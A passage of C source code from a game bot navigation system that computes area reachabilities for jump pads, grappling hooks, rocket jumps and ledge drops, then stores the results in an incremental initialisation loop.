lreach->areanum = area2num;
//NOTE: the facenum is the Z velocity
lreach->facenum = velocity[2];
//NOTE: the edgenum is the horizontal velocity
lreach->edgenum = sqrt(velocity[0] * velocity[0] + velocity[1] * velocity[1]);
VectorCopy(areastart, lreach->start);
VectorCopy(move.endpos, lreach->end);
lreach->traveltype = TRAVEL_JUMPPAD;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_jumppad;
lreach->next = areareachability[link->areanum];
areareachability[link->areanum] = lreach;
//
reach_jumppad++;
} //end for
} //end if
} //end if
//
if (fabs(velocity[0]) > 100 || fabs(velocity[1]) > 100) continue;
//check for areas we can reach with air control
for (area2num = 1; area2num < aasworld.numareas; area2num++)
{
visualize = qfalse;
/*
if (area2num == 3568)
{
for (link = areas; link; link = link->next_area)
{
if (link->areanum == 3380)
{
visualize = qtrue;
botimport.Print(PRT_MESSAGE, "bah\n");
} //end if
} //end for
} //end if*/
//never try to go back to one of the original jumppad areas
//and don't create reachabilities if they already exist
for (link = areas; link; link = link->next_area)
{
if (AAS_ReachabilityExists(link->areanum, area2num)) break;
if (AAS_AreaJumpPad(link->areanum))
{
if (link->areanum == area2num) break;
} //end if
} //end if
if (link) continue;
//
area2 = &aasworld.areas[area2num];
for (i = 0; i < area2->numfaces; i++)
{
face2num = aasworld.faceindex[area2->firstface + i];
face2 = &aasworld.faces[abs(face2num)];
//if it is not a ground face
if (!(face2->faceflags & FACE_GROUND)) continue;
//get the center of the face
AAS_FaceCenter(face2num, facecenter);
//only go higher up
if (facecenter[2] < areastart[2]) continue;
//get the jumppad jump z velocity
zvel = velocity[2];
//get the horizontal speed for the jump, if it isn't possible to calculate this
//speed
ret = AAS_HorizontalVelocityForJump(zvel, areastart, facecenter, &speed);
if (ret && speed < 150)
{
//direction towards the face center
VectorSubtract(facecenter, areastart, dir);
dir[2] = 0;
//hordist = VectorNormalize(dir);
//if (hordist < 1.6 * facecenter[2] - areastart[2])
{
//get command movement
VectorScale(dir, speed, cmdmove);
//
AAS_PredictClientMovement(&move, -1, areastart, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 30, 30, 0.1f,
SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|
SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER|SE_HITGROUNDAREA, area2num, visualize);
//if prediction time wasn't enough to fully predict the movement
//don't enter slime or lava and don't fall from too high
if (move.frames < 30 &&
!(move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA|SE_HITGROUNDDAMAGE))
&& (move.stopevent & (SE_HITGROUNDAREA|SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER)))
{
//never go back to the same jumppad
for (link = areas; link; link = link->next_area)
{
if (link->areanum == move.endarea) break;
}
if (!link)
{
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
if (AAS_ReachabilityExists(link->areanum, area2num)) continue;
//create a jumppad reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach)
{
AAS_UnlinkFromAreas(areas);
return;
} //end if
lreach->areanum = move.endarea;
//NOTE: the facenum is the Z velocity
lreach->facenum = velocity[2];
//NOTE: the edgenum is the horizontal velocity
lreach->edgenum = sqrt(cmdmove[0] * cmdmove[0] + cmdmove[1] * cmdmove[1]);
VectorCopy(areastart, lreach->start);
VectorCopy(facecenter, lreach->end);
lreach->traveltype = TRAVEL_JUMPPAD;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_aircontrolledjumppad;
lreach->next = areareachability[link->areanum];
areareachability[link->areanum] = lreach;
//
reach_jumppad++;
} //end for
}
} //end if
} //end if
} //end for
} //end for
} //end for
AAS_UnlinkFromAreas(areas);
} //end for
} //end of the function AAS_Reachability_JumpPad
//===========================================================================
// never point at ground faces
// always a higher and pretty far area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
// Tries to create a TRAVEL_GRAPPLEHOOK reachability from area1num towards
// each suitable solid face of area2num: the bot stands on the ground in
// area1num, fires the grapple at a wall or downward facing face of
// area2num and is pulled towards the hook point.
// NOTE: reachabilities are stored as a side effect in areareachability[];
// the return value is always qfalse so the caller keeps scanning faces/areas.
int AAS_Reachability_Grapple(int area1num, int area2num)
{
	int face2num, i, j, areanum, numareas, areas[20];
	float mingrappleangle, z, hordist;
	bsp_trace_t bsptrace;
	aas_trace_t trace;
	aas_face_t *face2;
	aas_area_t *area1, *area2;
	aas_lreachability_t *lreach;
	vec3_t areastart, facecenter, start, end, dir, down = {0, 0, -1};
	float *v;
	//only grapple when on the ground or swimming
	if (!AAS_AreaGrounded(area1num) && !AAS_AreaSwim(area1num)) return qfalse;
	//don't grapple from a crouch area
	if (!(AAS_AreaPresenceType(area1num) & PRESENCE_NORMAL)) return qfalse;
	//NOTE: grappling from swim areas is disabled because it doesn't work right
	if (AAS_AreaSwim(area1num)) return qfalse;
	//
	area1 = &aasworld.areas[area1num];
	area2 = &aasworld.areas[area2num];
	//don't grapple towards way lower areas
	if (area2->maxs[2] < area1->mins[2]) return qfalse;
	//
	VectorCopy(aasworld.areas[area1num].center, start);
	//if not a swim area
	//NOTE(review): the else branch below is dead code because of the
	//AAS_AreaSwim early return above; if it were ever re-enabled, areastart
	//would be left uninitialized on that path — confirm before reviving it
	if (!AAS_AreaSwim(area1num))
	{
		if (!AAS_PointAreaNum(start)) Log_Write("area %d center %f %f %f in solid?\r\n", area1num,
									start[0], start[1], start[2]);
		VectorCopy(start, end);
		end[2] -= 1000;
		//drop the area center down onto the ground
		trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
		if (trace.startsolid) return qfalse;
		VectorCopy(trace.endpos, areastart);
	} //end if
	else
	{
		if (!(AAS_PointContents(start) & (CONTENTS_LAVA|CONTENTS_SLIME|CONTENTS_WATER))) return qfalse;
	} //end else
	//
	//areastart is now the grapple launch point
	//
	for (i = 0; i < area2->numfaces; i++)
	{
		face2num = aasworld.faceindex[area2->firstface + i];
		face2 = &aasworld.faces[abs(face2num)];
		//if it is not a solid face
		if (!(face2->faceflags & FACE_SOLID)) continue;
		//direction towards the first vertex of the face
		v = aasworld.vertexes[aasworld.edges[abs(aasworld.edgeindex[face2->firstedge])].v[0]];
		VectorSubtract(v, areastart, dir);
		//if the face plane is facing away
		if (DotProduct(aasworld.planes[face2->planenum].normal, dir) > 0) continue;
		//get the center of the face
		AAS_FaceCenter(face2num, facecenter);
		//only go higher up with the grapple
		if (facecenter[2] < areastart[2] + 64) continue;
		//only use vertical faces or downward facing faces
		if (DotProduct(aasworld.planes[face2->planenum].normal, down) < 0) continue;
		//direction towards the face center
		VectorSubtract(facecenter, areastart, dir);
		//
		z = dir[2];
		dir[2] = 0;
		hordist = VectorLength(dir);
		if (!hordist) continue;
		//if too far
		if (hordist > 2000) continue;
		//check the minimal angle of the movement
		mingrappleangle = 15; //15 degrees
		if (z / hordist < tan(2 * M_PI * mingrappleangle / 360)) continue;
		//trace from the face center back along the face normal to find the hook point
		VectorCopy(facecenter, start);
		VectorMA(facecenter, -500, aasworld.planes[face2->planenum].normal, end);
		//
		bsptrace = AAS_Trace(start, NULL, NULL, end, 0, CONTENTS_SOLID);
		//the grapple won't stick to the sky and the grapple point should be near the AAS wall
		if ((bsptrace.surface.flags & SURF_SKY) || (bsptrace.fraction * 500 > 32)) continue;
		//trace a full bounding box from the area center on the ground to
		//the center of the face
		VectorSubtract(facecenter, areastart, dir);
		VectorNormalize(dir);
		VectorMA(areastart, 4, dir, start);
		VectorCopy(bsptrace.endpos, end);
		trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
		VectorSubtract(trace.endpos, facecenter, dir);
		if (VectorLength(dir) > 24) continue;
		//drop down from the hook point to find where the bot would land
		VectorCopy(trace.endpos, start);
		VectorCopy(trace.endpos, end);
		end[2] -= AAS_FallDamageDistance();
		trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
		if (trace.fraction >= 1) continue;
		//area to end in
		areanum = AAS_PointAreaNum(trace.endpos);
		//if not in lava or slime
		if (aasworld.areasettings[areanum].contents & (AREACONTENTS_SLIME|AREACONTENTS_LAVA))
		{
			continue;
		} //end if
		//do not go to the source area
		if (areanum == area1num) continue;
		//don't create reachabilities if they already exist
		if (AAS_ReachabilityExists(area1num, areanum)) continue;
		//only end in areas we can stand
		if (!AAS_AreaGrounded(areanum)) continue;
		//never go through cluster portals!!
		numareas = AAS_TraceAreas(areastart, bsptrace.endpos, areas, NULL, 20);
		if (numareas >= 20) continue;
		for (j = 0; j < numareas; j++)
		{
			if (aasworld.areasettings[areas[j]].contents & AREACONTENTS_CLUSTERPORTAL) break;
		} //end for
		if (j < numareas) continue;
		//create a new reachability link
		lreach = AAS_AllocReachability();
		if (!lreach) return qfalse;
		lreach->areanum = areanum;
		lreach->facenum = face2num;
		lreach->edgenum = 0;
		VectorCopy(areastart, lreach->start);
		//VectorCopy(facecenter, lreach->end);
		VectorCopy(bsptrace.endpos, lreach->end);
		lreach->traveltype = TRAVEL_GRAPPLEHOOK;
		VectorSubtract(lreach->end, lreach->start, dir);
		//travel time scales with the distance the grapple pulls the bot
		lreach->traveltime = aassettings.rs_startgrapple + VectorLength(dir) * 0.25;
		lreach->next = areareachability[area1num];
		areareachability[area1num] = lreach;
		//
		reach_grapple++;
	} //end for
	//
	return qfalse;
} //end of the function AAS_Reachability_Grapple
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
// Flags every area a bot might want to weapon jump (rocket jump) towards:
// areas holding interesting items and all jump pad areas get AREA_WEAPONJUMP.
void AAS_SetWeaponJumpAreaFlags(void)
{
	//item classnames worth weapon jumping towards
	static const char *wantedclassnames[] =
	{
		"item_armor_body",
		"item_health",
		"weapon_disruptor",
		"weapon_repeater",
		"weapon_demp2",
		"weapon_flechette",
		"weapon_rocket_launcher"
	};
	const int numwanted = sizeof(wantedclassnames) / sizeof(wantedclassnames[0]);
	vec3_t mins = {-15, -15, -15}, maxs = {15, 15, 15};
	vec3_t itemorigin;
	char classname[MAX_EPAIRKEY];
	int ent, n, areanum, spawnflags, numflagged;

	numflagged = 0;
	for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
	{
		if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
		//skip entities that are not in the wanted classname list
		for (n = 0; n < numwanted; n++)
		{
			if (!strcmp(classname, wantedclassnames[n])) break;
		} //end for
		if (n >= numwanted) continue;
		//skip entities without an origin
		if (!AAS_VectorForBSPEpairKey(ent, "origin", itemorigin)) continue;
		spawnflags = 0;
		AAS_IntForBSPEpairKey(ent, "spawnflags", &spawnflags);
		//if not a suspended item, drop it onto the floor first
		if (!(spawnflags & 1))
		{
			if (!AAS_DropToFloor(itemorigin, mins, maxs))
			{
				botimport.Print(PRT_MESSAGE, "%s in solid at (%1.1f %1.1f %1.1f)\n",
							classname, itemorigin[0], itemorigin[1], itemorigin[2]);
			} //end if
		} //end if
		areanum = AAS_BestReachableArea(itemorigin, mins, maxs, itemorigin);
		//the bot may rocket jump towards this area
		aasworld.areasettings[areanum].areaflags |= AREA_WEAPONJUMP;
		numflagged++;
	} //end for
	//jump pad areas are also valid weapon jump targets
	for (areanum = 1; areanum < aasworld.numareas; areanum++)
	{
		if (!(aasworld.areasettings[areanum].contents & AREACONTENTS_JUMPPAD)) continue;
		aasworld.areasettings[areanum].areaflags |= AREA_WEAPONJUMP;
		numflagged++;
	} //end for
	botimport.Print(PRT_MESSAGE, "%d weapon jump areas\n", numflagged);
} //end of the function AAS_SetWeaponJumpAreaFlags
//===========================================================================
// create a possible weapon jump reachability from area1 to area2
//
// check if there's a cool item in the second area
// check if area1 is lower than area2
// check if the bot can rocketjump from area1 to area2
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
// Tries to create a TRAVEL_ROCKETJUMP (or, when the inner loop is extended
// to 2, TRAVEL_BFGJUMP) reachability from area1num to area2num: the bot
// fires at its own feet to gain upward velocity and air-moves towards a
// ground face of area2num.  Only attempted towards areas that were flagged
// AREA_WEAPONJUMP by AAS_SetWeaponJumpAreaFlags().
// Returns qtrue if a reachability was created, qfalse otherwise.
int AAS_Reachability_WeaponJump(int area1num, int area2num)
{
	int face2num, i, n, ret, visualize;
	float speed, zvel;
	//float hordist;
	aas_face_t *face2;
	aas_area_t *area1, *area2;
	aas_lreachability_t *lreach;
	vec3_t areastart, facecenter, start, end, dir, cmdmove;// teststart;
	vec3_t velocity;
	aas_clientmove_t move;
	aas_trace_t trace;
	visualize = qfalse;
//	if (area1num == 4436 && area2num == 4318)
//	{
//		visualize = qtrue;
//	}
	//must start from a grounded, non swim area and land in a grounded area
	if (!AAS_AreaGrounded(area1num) || AAS_AreaSwim(area1num)) return qfalse;
	if (!AAS_AreaGrounded(area2num)) return qfalse;
	//NOTE: only weapon jump towards areas with an interesting item in it??
	if (!(aasworld.areasettings[area2num].areaflags & AREA_WEAPONJUMP)) return qfalse;
	//
	area1 = &aasworld.areas[area1num];
	area2 = &aasworld.areas[area2num];
	//don't weapon jump towards way lower areas
	if (area2->maxs[2] < area1->mins[2]) return qfalse;
	//
	VectorCopy(aasworld.areas[area1num].center, start);
	//the area center should be inside the area, otherwise the AAS data is broken
	if (!AAS_PointAreaNum(start)) Log_Write("area %d center %f %f %f in solid?\r\n", area1num,
								start[0], start[1], start[2]);
	VectorCopy(start, end);
	end[2] -= 1000;
	//drop the area center down onto the ground
	trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
	if (trace.startsolid) return qfalse;
	VectorCopy(trace.endpos, areastart);
	//
	//areastart is now the jump start point on the ground
	//
	for (i = 0; i < area2->numfaces; i++)
	{
		face2num = aasworld.faceindex[area2->firstface + i];
		face2 = &aasworld.faces[abs(face2num)];
		//if it is not a ground face
		if (!(face2->faceflags & FACE_GROUND)) continue;
		//get the center of the face
		AAS_FaceCenter(face2num, facecenter);
		//only go higher up with weapon jumps
		if (facecenter[2] < areastart[2] + 64) continue;
		//NOTE: set the loop end to 2 to also allow bfg jump reachabilities
		for (n = 0; n < 1/*2*/; n++)
		{
			//get the rocket jump z velocity
			if (n) zvel = AAS_BFGJumpZVelocity(areastart);
			else zvel = AAS_RocketJumpZVelocity(areastart);
			//get the horizontal speed for the jump, if it isn't possible to calculate this
			//speed (the jump is not possible) then there's no jump reachability created
			ret = AAS_HorizontalVelocityForJump(zvel, areastart, facecenter, &speed);
			if (ret && speed < 300)
			{
				//direction towards the face center
				VectorSubtract(facecenter, areastart, dir);
				dir[2] = 0;
				//hordist = VectorNormalize(dir);
				//if (hordist < 1.6 * (facecenter[2] - areastart[2]))
				{
					//get command movement
					VectorScale(dir, speed, cmdmove);
					VectorSet(velocity, 0, 0, zvel);
					/*
					//get command movement
					VectorScale(dir, speed, velocity);
					velocity[2] = zvel;
					VectorSet(cmdmove, 0, 0, 0);
					*/
					//simulate the jump for at most 30 frames of 0.1 seconds
					AAS_PredictClientMovement(&move, -1, areastart, PRESENCE_NORMAL, qtrue,
												velocity, cmdmove, 30, 30, 0.1f,
												SE_ENTERWATER|SE_ENTERSLIME|
												SE_ENTERLAVA|SE_HITGROUNDDAMAGE|
												SE_TOUCHJUMPPAD|SE_HITGROUND|SE_HITGROUNDAREA, area2num, visualize);
					//if prediction time wasn't enough to fully predict the movement
					//don't enter slime or lava and don't fall from too high
					if (move.frames < 30 &&
							!(move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA|SE_HITGROUNDDAMAGE))
							&& (move.stopevent & (SE_HITGROUNDAREA|SE_TOUCHJUMPPAD)))
					{
						//create a rocket or bfg jump reachability from area1 to area2
						lreach = AAS_AllocReachability();
						if (!lreach) return qfalse;
						lreach->areanum = area2num;
						lreach->facenum = 0;
						lreach->edgenum = 0;
						VectorCopy(areastart, lreach->start);
						VectorCopy(facecenter, lreach->end);
						if (n)
						{
							lreach->traveltype = TRAVEL_BFGJUMP;
							lreach->traveltime = aassettings.rs_bfgjump;
						} //end if
						else
						{
							lreach->traveltype = TRAVEL_ROCKETJUMP;
							lreach->traveltime = aassettings.rs_rocketjump;
						} //end else
						lreach->next = areareachability[area1num];
						areareachability[area1num] = lreach;
						//
						reach_rocketjump++;
						return qtrue;
					} //end if
				} //end if
			} //end if
		} //end for
	} //end for
	//
	return qfalse;
} //end of the function AAS_Reachability_WeaponJump
//===========================================================================
// calculates additional walk off ledge reachabilities for the given area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
// Calculates additional TRAVEL_WALKOFFLEDGE reachabilities for the given
// area: for every edge where a ground face of the area meets a non-ground
// face (a ledge), a trace is dropped down from just outside the ledge and
// a reachability is created into the area the bot would land in.
// Reachabilities are prepended to areareachability[areanum].
void AAS_Reachability_WalkOffLedge(int areanum)
{
	int i, j, k, l, m, n, p, areas[10], numareas;
	int face1num, face2num, face3num, edge1num, edge2num, edge3num;
	int otherareanum, gap, reachareanum, side;
	aas_area_t *area, *area2;
	aas_face_t *face1, *face2, *face3;
	aas_edge_t *edge;
	aas_plane_t *plane;
	float *v1, *v2;
	vec3_t sharededgevec, mid, dir, testend;
	aas_lreachability_t *lreach;
	aas_trace_t trace;
	//only walk off ledges from grounded, non swim areas
	if (!AAS_AreaGrounded(areanum) || AAS_AreaSwim(areanum)) return;
	//
	area = &aasworld.areas[areanum];
	//
	for (i = 0; i < area->numfaces; i++)
	{
		face1num = aasworld.faceindex[area->firstface + i];
		face1 = &aasworld.faces[abs(face1num)];
		//face 1 must be a ground face
		if (!(face1->faceflags & FACE_GROUND)) continue;
		//go through all the edges of this ground face
		for (k = 0; k < face1->numedges; k++)
		{
			edge1num = aasworld.edgeindex[face1->firstedge + k];
			//find another not ground face using this same edge
			for (j = 0; j < area->numfaces; j++)
			{
				face2num = aasworld.faceindex[area->firstface + j];
				face2 = &aasworld.faces[abs(face2num)];
				//face 2 may not be a ground face
				if (face2->faceflags & FACE_GROUND) continue;
				//compare all the edges
				for (l = 0; l < face2->numedges; l++)
				{
					edge2num = aasworld.edgeindex[face2->firstedge + l];
					if (abs(edge1num) == abs(edge2num))
					{
						//get the area at the other side of the face
						if (face2->frontarea == areanum) otherareanum = face2->backarea;
						else otherareanum = face2->frontarea;
						//
						area2 = &aasworld.areas[otherareanum];
						//if the other area is grounded!
						if (aasworld.areasettings[otherareanum].areaflags & AREA_GROUNDED)
						{
							//check for a possible gap
							gap = qfalse;
							for (n = 0; n < area2->numfaces; n++)
							{
								face3num = aasworld.faceindex[area2->firstface + n];
								//may not be the shared face of the two areas
								if (abs(face3num) == abs(face2num)) continue;
								//
								face3 = &aasworld.faces[abs(face3num)];
								//find an edge shared by all three faces
								for (m = 0; m < face3->numedges; m++)
								{
									edge3num = aasworld.edgeindex[face3->firstedge + m];
									//but the edge should be shared by all three faces
									if (abs(edge3num) == abs(edge1num))
									{
										//a non solid face means there's a gap to fall into
										if (!(face3->faceflags & FACE_SOLID))
										{
											gap = qtrue;
											break;
										} //end if
										//a ground face means the floor continues, no gap
										if (face3->faceflags & FACE_GROUND)
										{
											gap = qfalse;
											break;
										} //end if
										//FIXME: there are more situations to be handled
										gap = qtrue;
										break;
									} //end if
								} //end for
								if (m < face3->numedges) break;
							} //end for
							if (!gap) break;
						} //end if
						//check for a walk off ledge reachability
						edge = &aasworld.edges[abs(edge1num)];
						side = edge1num < 0;
						//
						v1 = aasworld.vertexes[edge->v[side]];
						v2 = aasworld.vertexes[edge->v[!side]];
						//
						plane = &aasworld.planes[face1->planenum];
						//get the points really into the areas
						VectorSubtract(v2, v1, sharededgevec);
						CrossProduct(plane->normal, sharededgevec, dir);
						VectorNormalize(dir);
						//mid is the middle of the edge pushed 8 units over the ledge
						VectorAdd(v1, v2, mid);
						VectorScale(mid, 0.5, mid);
						VectorMA(mid, 8, dir, mid);
						//drop down from just over the ledge
						VectorCopy(mid, testend);
						testend[2] -= 1000;
						trace = AAS_TraceClientBBox(mid, testend, PRESENCE_CROUCH, -1);
						//
						if (trace.startsolid)
						{
							//Log_Write("area %d: trace.startsolid\r\n", areanum);
							break;
						} //end if
						reachareanum = AAS_PointAreaNum(trace.endpos);
						if (reachareanum == areanum)
						{
							//Log_Write("area %d: same area\r\n", areanum);
							break;
						} //end if
						if (AAS_ReachabilityExists(areanum, reachareanum))
						{
							//Log_Write("area %d: reachability already exists\r\n", areanum);
							break;
						} //end if
						if (!AAS_AreaGrounded(reachareanum) && !AAS_AreaSwim(reachareanum))
						{
							//Log_Write("area %d, reach area %d: not grounded and not swim\r\n", areanum, reachareanum);
							break;
						} //end if
						//don't fall into lava or slime
						if (aasworld.areasettings[reachareanum].contents & (AREACONTENTS_SLIME
													| AREACONTENTS_LAVA))
						{
							//Log_Write("area %d, reach area %d: lava or slime\r\n", areanum, reachareanum);
							break;
						} //end if
						//if not going through a cluster portal
						numareas = AAS_TraceAreas(mid, testend, areas, NULL, ARRAY_LEN(areas));
						for (p = 0; p < numareas; p++)
							if (AAS_AreaClusterPortal(areas[p]))
								break;
						if (p < numareas)
							break;
						// if a maximum fall height is set and the bot would fall down further
						if (aassettings.rs_maxfallheight && fabs(mid[2] - trace.endpos[2]) > aassettings.rs_maxfallheight)
							break;
						//
						lreach = AAS_AllocReachability();
						if (!lreach) break;
						lreach->areanum = reachareanum;
						lreach->facenum = 0;
						lreach->edgenum = edge1num;
						VectorCopy(mid, lreach->start);
						VectorCopy(trace.endpos, lreach->end);
						lreach->traveltype = TRAVEL_WALKOFFLEDGE;
						lreach->traveltime = aassettings.rs_startwalkoffledge + fabs(mid[2] - trace.endpos[2]) * 50 / aassettings.phys_gravity;
						//add a penalty when the fall is far enough to take damage
						if (!AAS_AreaSwim(reachareanum) && !AAS_AreaJumpPad(reachareanum))
						{
							if (AAS_FallDelta(mid[2] - trace.endpos[2]) > aassettings.phys_falldelta5)
							{
								lreach->traveltime += aassettings.rs_falldamage5;
							} //end if
							else if (AAS_FallDelta(mid[2] - trace.endpos[2]) > aassettings.phys_falldelta10)
							{
								lreach->traveltime += aassettings.rs_falldamage10;
							} //end if
						} //end if
						lreach->next = areareachability[areanum];
						areareachability[areanum] = lreach;
						//we've got another walk off ledge reachability
						reach_walkoffledge++;
					} //end if
				} //end for
			} //end for
		} //end for
	} //end for
} //end of the function AAS_Reachability_WalkOffLedge
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
// Flattens the per-area linked lists in areareachability[] into the
// contiguous aasworld.reachability array and stores, per area, the first
// index and the count of its reachabilities in the area settings.
void AAS_StoreReachability(void)
{
	int areanum;
	aas_areasettings_t *settings;
	aas_lreachability_t *link;
	aas_reachability_t *dest;

	if (aasworld.reachability) FreeMemory(aasworld.reachability);
	aasworld.reachability = (aas_reachability_t *) GetClearedMemory((numlreachabilities + 10) * sizeof(aas_reachability_t));
	//index zero is reserved as a dummy entry
	aasworld.reachabilitysize = 1;
	for (areanum = 0; areanum < aasworld.numareas; areanum++)
	{
		settings = &aasworld.areasettings[areanum];
		settings->firstreachablearea = aasworld.reachabilitysize;
		settings->numreachableareas = 0;
		for (link = areareachability[areanum]; link; link = link->next)
		{
			dest = &aasworld.reachability[settings->firstreachablearea + settings->numreachableareas];
			dest->areanum = link->areanum;
			dest->facenum = link->facenum;
			dest->edgenum = link->edgenum;
			VectorCopy(link->start, dest->start);
			VectorCopy(link->end, dest->end);
			dest->traveltype = link->traveltype;
			dest->traveltime = link->traveltime;
			settings->numreachableareas++;
		} //end for
		aasworld.reachabilitysize += settings->numreachableareas;
	} //end for
} //end of the function AAS_StoreReachability
//===========================================================================
//
// TRAVEL_WALK 100% equal floor height + steps
// TRAVEL_CROUCH 100%
// TRAVEL_BARRIERJUMP 100%
// TRAVEL_JUMP 80%
// TRAVEL_LADDER 100% + fall down from ladder + jump up to ladder
// TRAVEL_WALKOFFLEDGE 90% walk off very steep walls?
// TRAVEL_SWIM 100%
// TRAVEL_WATERJUMP 100%
// TRAVEL_TELEPORT 100%
// TRAVEL_ELEVATOR 100%
// TRAVEL_GRAPPLEHOOK 100%
// TRAVEL_DOUBLEJUMP 0%
// TRAVEL_RAMPJUMP 0%
// TRAVEL_STRAFEJUMP 0%
// TRAVEL_ROCKETJUMP 100% (currently limited towards areas with items)
// TRAVEL_BFGJUMP 0% (currently disabled)
// TRAVEL_JUMPPAD 100%
// TRAVEL_FUNCBOB 100%
//
// Parameter: -
// Returns: true if NOT finished
// Changes Globals: -
//===========================================================================
// Performs part of the reachability calculation; called repeatedly so the
// work can be spread over multiple frames.
// Phase 1: per area-pair reachabilities (swim, equal floor, step/barrier/
//          waterjump/walkoffledge, ladder, jump, grapple, weapon jump),
//          throttled per call by framereachability and reachability_delay.
// Phase 2: walk off ledge plus entity based reachabilities (jump pads,
//          teleporters, elevators, func_bobbing), then stores the results.
// NOTE: the time parameter is unused.
// Returns qtrue as long as the calculation is NOT finished.
int AAS_ContinueInitReachability(float time)
{
	int i, j, todo, start_time;
	static float framereachability, reachability_delay;
	static int lastpercentage;
	if (!aasworld.loaded) return qfalse;
	//if reachability is calculated for all areas
	if (aasworld.numreachabilityareas >= aasworld.numareas + 2) return qfalse;
	//if starting with area 1 (area 0 is a dummy)
	if (aasworld.numreachabilityareas == 1)
	{
		botimport.Print(PRT_MESSAGE, "calculating reachability...\n");
		lastpercentage = 0;
		framereachability = 2000;
		reachability_delay = 1000;
	} //end if
	//number of areas to calculate reachability for this cycle
	todo = aasworld.numreachabilityareas + (int) framereachability;
	start_time = Sys_MilliSeconds();
	//loop over the areas
	for (i = aasworld.numreachabilityareas; i < aasworld.numareas && i < todo; i++)
	{
		aasworld.numreachabilityareas++;
		//only create jumppad reachabilities from jumppad areas
		if (aasworld.areasettings[i].contents & AREACONTENTS_JUMPPAD)
		{
			continue;
		} //end if
		//loop over the areas
		for (j = 1; j < aasworld.numareas; j++)
		{
			if (i == j) continue;
			//never create reachabilities from teleporter or jumppad areas to regular areas
			if (aasworld.areasettings[i].contents & (AREACONTENTS_TELEPORTER|AREACONTENTS_JUMPPAD))
			{
				if (!(aasworld.areasettings[j].contents & (AREACONTENTS_TELEPORTER|AREACONTENTS_JUMPPAD)))
				{
					continue;
				} //end if
			} //end if
			//if there already is a reachability link from area i to j
			if (AAS_ReachabilityExists(i, j)) continue;
			//check for a swim reachability
			if (AAS_Reachability_Swim(i, j)) continue;
			//check for a simple walk on equal floor height reachability
			if (AAS_Reachability_EqualFloorHeight(i, j)) continue;
			//check for step, barrier, waterjump and walk off ledge reachabilities
			if (AAS_Reachability_Step_Barrier_WaterJump_WalkOffLedge(i, j)) continue;
			//check for ladder reachabilities
			if (AAS_Reachability_Ladder(i, j)) continue;
			//check for a jump reachability
			if (AAS_Reachability_Jump(i, j)) continue;
		} //end for
		//never create these reachabilities from teleporter or jumppad areas
		if (aasworld.areasettings[i].contents & (AREACONTENTS_TELEPORTER|AREACONTENTS_JUMPPAD))
		{
			continue;
		} //end if
		//loop over the areas
		for (j = 1; j < aasworld.numareas; j++)
		{
			if (i == j) continue;
			//
			if (AAS_ReachabilityExists(i, j)) continue;
			//check for a grapple hook reachability
			if (calcgrapplereach) AAS_Reachability_Grapple(i, j);
			//check for a weapon jump reachability
			AAS_Reachability_WeaponJump(i, j);
		} //end for
		//if the calculation took more time than the max reachability delay
		if (Sys_MilliSeconds() - start_time > (int) reachability_delay) break;
		//also break when the progress percentage would change, to update the display
		if (aasworld.numreachabilityareas * 1000 / aasworld.numareas > lastpercentage) break;
	} //end for
	//
	if (aasworld.numreachabilityareas == aasworld.numareas)
	{
		botimport.Print(PRT_MESSAGE, "\r%6.1f%%", (float) 100.0);
		botimport.Print(PRT_MESSAGE, "\nplease wait while storing reachability...\n");
		aasworld.numreachabilityareas++;
	} //end if
	//if this is the last step in the reachability calculations
	else if (aasworld.numreachabilityareas == aasworld.numareas + 1)
	{
		//create additional walk off ledge reachabilities for every area
		for (i = 1; i < aasworld.numareas; i++)
		{
			//only create jumppad reachabilities from jumppad areas
			if (aasworld.areasettings[i].contents & AREACONTENTS_JUMPPAD)
			{
				continue;
			} //end if
			AAS_Reachability_WalkOffLedge(i);
		} //end for
		//create jump pad reachabilities
		AAS_Reachability_JumpPad();
		//create teleporter reachabilities
		AAS_Reachability_Teleport();
		//create elevator (func_plat) reachabilities
		AAS_Reachability_Elevator();
		//create func_bobbing reachabilities
		AAS_Reachability_FuncBobbing();
		//
#ifdef DEBUG
		botimport.Print(PRT_MESSAGE, "%6d reach swim\n", reach_swim);
		botimport.Print(PRT_MESSAGE, "%6d reach equal floor\n", reach_equalfloor);
		botimport.Print(PRT_MESSAGE, "%6d reach step\n", reach_step);
		botimport.Print(PRT_MESSAGE, "%6d reach barrier\n", reach_barrier);
		botimport.Print(PRT_MESSAGE, "%6d reach waterjump\n", reach_waterjump);
		botimport.Print(PRT_MESSAGE, "%6d reach walkoffledge\n", reach_walkoffledge);
		botimport.Print(PRT_MESSAGE, "%6d reach jump\n", reach_jump);
		botimport.Print(PRT_MESSAGE, "%6d reach ladder\n", reach_ladder);
		botimport.Print(PRT_MESSAGE, "%6d reach walk\n", reach_walk);
		botimport.Print(PRT_MESSAGE, "%6d reach teleport\n", reach_teleport);
		botimport.Print(PRT_MESSAGE, "%6d reach funcbob\n", reach_funcbob);
		botimport.Print(PRT_MESSAGE, "%6d reach elevator\n", reach_elevator);
		botimport.Print(PRT_MESSAGE, "%6d reach grapple\n", reach_grapple);
		botimport.Print(PRT_MESSAGE, "%6d reach rocketjump\n", reach_rocketjump);
